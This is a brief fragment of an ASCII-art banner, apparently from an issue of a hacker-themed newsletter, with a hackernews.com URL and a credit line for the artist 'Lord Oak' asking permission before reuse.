_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.
